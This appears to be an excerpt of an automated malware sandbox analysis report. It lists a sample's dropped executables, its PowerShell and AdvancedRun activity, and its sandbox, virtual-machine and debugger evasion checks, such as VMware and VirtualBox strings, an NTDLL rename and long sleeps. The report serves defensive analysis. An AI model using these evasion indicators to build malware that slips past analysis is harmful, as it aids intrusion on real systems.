Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: 37D8.exe PID: 6468, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 6E1E.exe, 0000001B.00000002.558082279.0000000002DDA000.00000004.00000020.sdmp Binary or memory string: ASWHOOK-X
Source: esdfufc, 0000000E.00000002.482643867.0000000001F70000.00000004.00000001.sdmp Binary or memory string: ASWHOOK1
Source: y8WngeDn4q.exe, 00000003.00000002.411777518.00000000004E8000.00000004.00000020.sdmp Binary or memory string: ASWHOOK#
Source: 37D8.exe, 00000013.00000003.572995540.0000000006BEB000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
Source: 37D8.exe, 00000013.00000003.572995540.0000000006BEB000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLUSER
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\esdfufc Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\esdfufc Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\esdfufc Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\esdfufc Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\esdfufc Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\esdfufc Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Renames NTDLL to bypass HIPS
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe File opened: C:\Windows\SysWOW64\ntdll.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe File opened: C:\Windows\SysWOW64\ntdll.dll Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe TID: 6124 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5776 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5564 Thread sleep time: -922337203685477s >= -30000s
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 575 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 367 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4760
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3853
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3144
Found dropped PE file which has not been started or loaded
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3AE.exe Jump to dropped file
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\FBAD.exe Jump to dropped file
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\FC0C.exe Jump to dropped file
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E11F.exe Jump to dropped file
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DAA6.exe Jump to dropped file
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C036B90 rdtsc 22_2_6C036B90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: explorer.exe, 00000006.00000000.387883837.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000006.00000000.373511562.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: 37D8.exe, 00000013.00000003.572995540.0000000006BEB000.00000004.00000001.sdmp Binary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: 37D8.exe, 00000013.00000003.572995540.0000000006BEB000.00000004.00000001.sdmp Binary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000006.00000000.383874507.000000000461E000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}e-1
Source: explorer.exe, 00000006.00000000.385268947.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 37D8.exe, 00000013.00000003.572995540.0000000006BEB000.00000004.00000001.sdmp Binary or memory string: vmware
Source: 37D8.exe, 00000013.00000003.572995540.0000000006BEB000.00000004.00000001.sdmp Binary or memory string: VMwareVBoxARun using valid operating system
Source: explorer.exe, 00000006.00000000.387883837.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000006.00000000.372864089.00000000082E2000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
Source: explorer.exe, 00000006.00000000.385268947.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.403045513.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: 37D8.exe, 00000013.00000003.572995540.0000000006BEB000.00000004.00000001.sdmp Binary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
Source: 37D8.exe, 00000013.00000003.572995540.0000000006BEB000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: AdvancedRun.exe, 00000019.00000002.527608014.00000000007AA000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 37D8.exe, 00000013.00000003.572995540.0000000006BEB000.00000004.00000001.sdmp Binary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
Source: AdvancedRun.exe, 00000019.00000002.527608014.00000000007AA000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.403045513.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000006.00000000.373511562.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: D083.exe, 0000002B.00000002.675692682.0000000000EDD000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000006.00000000.393764920.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\y8WngeDn4q.exe System information queried: ModuleInformation Jump to behavior

Anti Debugging:

barindex
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\y8WngeDn4q.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\esdfufc System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe System information queried: CodeIntegrityInformation
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 0_2_00426B60 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00426B60
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 0_2_04760042 push dword ptr fs:[00000030h] 0_2_04760042
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 12_2_02CB0042 push dword ptr fs:[00000030h] 12_2_02CB0042
Source: C:\Users\user\AppData\Local\Temp\8908.exe Code function: 13_2_02B60042 push dword ptr fs:[00000030h] 13_2_02B60042
